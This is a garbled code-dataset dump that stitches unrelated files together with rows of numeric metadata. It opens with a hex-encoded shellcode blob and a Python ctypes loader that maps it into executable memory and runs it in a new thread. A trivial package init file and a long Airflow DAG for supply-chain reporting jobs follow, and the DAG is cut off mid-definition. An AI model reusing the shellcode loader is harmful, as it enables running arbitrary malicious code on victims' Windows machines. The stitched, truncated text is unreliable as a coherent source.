\x6d\x11\x10\x3a\xbd\xbb\x5b\x44\x71\x4f\xd8\x72\x29\x59\x15\xc0\x79\x41\xd8\x70\x29\x59\xaa\x86\x18\xba\xd1\xc9\xe6\xa7\x94\x07\x6f\x45\x99\xb9\xb7\x4d\x54\x07\xeb\x4d\x81\xb9\xb5\x4d\x54\x07\x6f\x4d\x81\xb9\xb7\x4d\x44\x07\x5d\x48\xd0\x07\xfc\x11\xab\x8f\x18\x82\xc6\xb9\xc2\xbe\x0c\x2c\x6d\x00\xd0\x3f\xff\xa9\xe1\xe4\x3b\xa6\x4c"
#PAGE_EXECUTE_READWRITEVIRTUAL_MEM
PAGE_EXECUTE_READWRITE = 0x00000040 #
VIRTUAL_MEM = ( 0x1000 | 0x2000 ) #
buf_arr = bytearray (buf) #shellcode
buf_size = len(buf_arr) #shellcode
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") #kernel32.dll
kernel32.VirtualAlloc.restype = ctypes.c_uint64 #c_uint64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) #
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) #shellcode
#print(sc_ptr)
#print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) #dllshellcode
handle = kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(sc_ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
| 138.259259
| 2,691
| 0.728101
| 810
| 3,733
| 3.307407
| 0.304938
| 0.036581
| 0.037327
| 0.024636
| 0.048899
| 0.029115
| 0.028742
| 0.020903
| 0.020903
| 0
| 0
| 0.270394
| 0.060809
| 3,733
| 26
| 2,692
| 143.576923
| 0.493725
| 0.031878
| 0
| 0.15
| 0
| 0.05
| 0.748473
| 0.745142
| 0
| 1
| 0.006108
| 0
| 0
| 1
| 0
| false
| 0
| 0.15
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c345fd079741039dc11bf1c143ba53b127e47ea
| 185
|
py
|
Python
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | 1
|
2021-02-27T07:41:29.000Z
|
2021-02-27T07:41:29.000Z
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | 1
|
2021-01-07T02:49:00.000Z
|
2021-01-09T04:53:30.000Z
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | null | null | null |
from nero.core.neural_types.axes import *
from nero.core.neural_types.comparison import *
from nero.core.neural_types.elements import *
from nero.core.neural_types.neural_type import *
| 37
| 48
| 0.827027
| 29
| 185
| 5.103448
| 0.344828
| 0.216216
| 0.324324
| 0.486486
| 0.743243
| 0.587838
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086486
| 185
| 4
| 49
| 46.25
| 0.87574
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
308443da79a8fd622bc9a189b12ce40a0da5a8a7
| 43,282
|
py
|
Python
|
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | 1
|
2022-03-10T03:47:35.000Z
|
2022-03-10T03:47:35.000Z
|
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import re
import airflow
import pendulum
from datetime import datetime, timedelta
from airflow.operators.sensors import ExternalTaskSensor
from airflow.operators.python_operator import PythonOperator
from airflow.operators.bash_operator import BashOperator
from airflow.contrib.sensors.file_sensor import FileSensor
from airflow import models
from airflow.models import Variable, DagModel, DagBag
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator
# For ODP platform
# from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
# from airflow.operators.oracle_operator import OracleOperator
from acme.operators.sqlg_mssql import MsSqlOperatorWithTemplatedParams
from airflow.operators.mssql_operator import MsSqlOperator
# DB_NAME = 'DWH' # for future xDB operator
proj_start_date = pendulum.datetime(2021, 1, 1, tzinfo="Etc/GMT-8")
tmpl_search_path = Variable.get("sql_path")
data_stage_imp_ptn = '_ODS_'
data_stage = []
# list for standard internval order sequence
std_interval = {
'@once' :1,
'@hourly' :2,
'0 5 * * *' :3,
'0 5 * * 0' :4,
'0 5 1 * *' :5,
'0 5 1 */3 *' :6,
'0 5 1 1 *' :7,
}
# function to sync execution for diff frequency
def sqlg_exec_date_fn(dt, context):
var_date = Variable.get("sqlg_execution_date")
ti = context['ti']
dag = context['dag']
ti_exec_date = context['execution_date']
schedule_interval = dag.schedule_interval
# if wait INIT and standard freq then set as default {{ ds }} # set in planner
# else use dag own execution date
if ti.task.external_dag_id == 'D_STG_INIT' and schedule_interval[0] == '@':
exec_date = pendulum.parse(var_date)
else:
exec_date = ti_exec_date
print("sqlg_exec_date_fn::DEBUG:external_dag_id, exec_date:", ti.task.external_dag_id, exec_date)
return exec_date
args = {
"owner": "SPA010038",
'start_date': proj_start_date,
'provide_context': True
}
# XSLT:loop: declaration: END}
# XSLT:loop: JOB_FLOW_NAME: START{
job_flow_name = "D_ODS_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_ODS_SCM = airflow.DAG(
"D_ODS_SCM",
tags=tags,
schedule_interval="0 5 * * *",
dagrun_timeout=timedelta(minutes=60*4),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=proj_start_date,
max_active_runs=1
)
job_flow_name = "D_DM_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_DM_SCM = airflow.DAG(
"D_DM_SCM",
tags=tags,
schedule_interval="0 5 * * *",
dagrun_timeout=timedelta(minutes=60*4),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=proj_start_date,
max_active_runs=1
)
job_flow_name = "D_INT_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_INT_SCM = airflow.DAG(
"D_INT_SCM",
tags=tags,
schedule_interval="0 5 * * *",
dagrun_timeout=timedelta(minutes=60*4),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=proj_start_date,
max_active_runs=1
)
# XSLT:loop: JOB_FLOW_NAME: END}
# JOB_TYPE=ODS-MAIN
my_taskid = "PNL_Revenue_Cost_A"
PNL_Revenue_Cost_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "NRE_Summary"
NRE_Summary = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "Daily_Revenue_F"
Daily_Revenue_F = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "RFQ_Master"
RFQ_Master = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "Inventory_A"
Inventory_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DOI_Actual"
DOI_Actual = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_ODS_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_PNL_Revenue_Cost_A"
DM_PNL_Revenue_Cost_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_NRE_Summary"
DM_NRE_Summary = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_Daily_Revenue_F"
DM_Daily_Revenue_F = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_RFQ_Master"
DM_RFQ_Master = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_Inventory_A"
DM_Inventory_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DM_DOI_Actual"
DM_DOI_Actual = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_DM_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_PNL_Revenue_Cost_A"
INT_PNL_Revenue_Cost_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_NRE_Summary"
INT_NRE_Summary = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_Daily_Revenue_F"
INT_Daily_Revenue_F = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_RFQ_Master"
INT_RFQ_Master = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_Inventory_A"
INT_Inventory_A = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "INT_DOI_Actual"
INT_DOI_Actual = MsSqlOperatorWithTemplatedParams(
auto_commit=True,
task_id=my_taskid,
pool = "sql_pool",
dag=D_INT_SCM,
# parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
timeout=60*60*3,
sql= "EXECUTE SQLEXT." + my_taskid + "_SP "+
"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}" +
";"
)
ExternalTaskSensor.ui_color = 'white'
ExternalTaskSensor.ui_fgcolor = 'blue'
# tmpl_search_path = Variable.get("sql_path")
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External:START{{
def branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_SCM,
provide_context=True,
)
my_taskid = "proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_SCM,
)
# Cross dag sensor
my_taskid = "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
D_ODS_SCMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
def branch_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A","D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A","D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_PNL_Revenue_Cost_A",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
def branch_D_DM_SCMxD_INT_SCM__INT_NRE_Summary(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary","D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary","D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_NRE_Summary,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
D_DM_SCMxD_INT_SCM__INT_NRE_Summary= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_NRE_Summary",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
def branch_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F","D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F","D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_Daily_Revenue_F",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
def branch_D_DM_SCMxD_INT_SCM__INT_RFQ_Master(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master","D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master","D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_RFQ_Master,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
D_DM_SCMxD_INT_SCM__INT_RFQ_Master= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_RFQ_Master",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
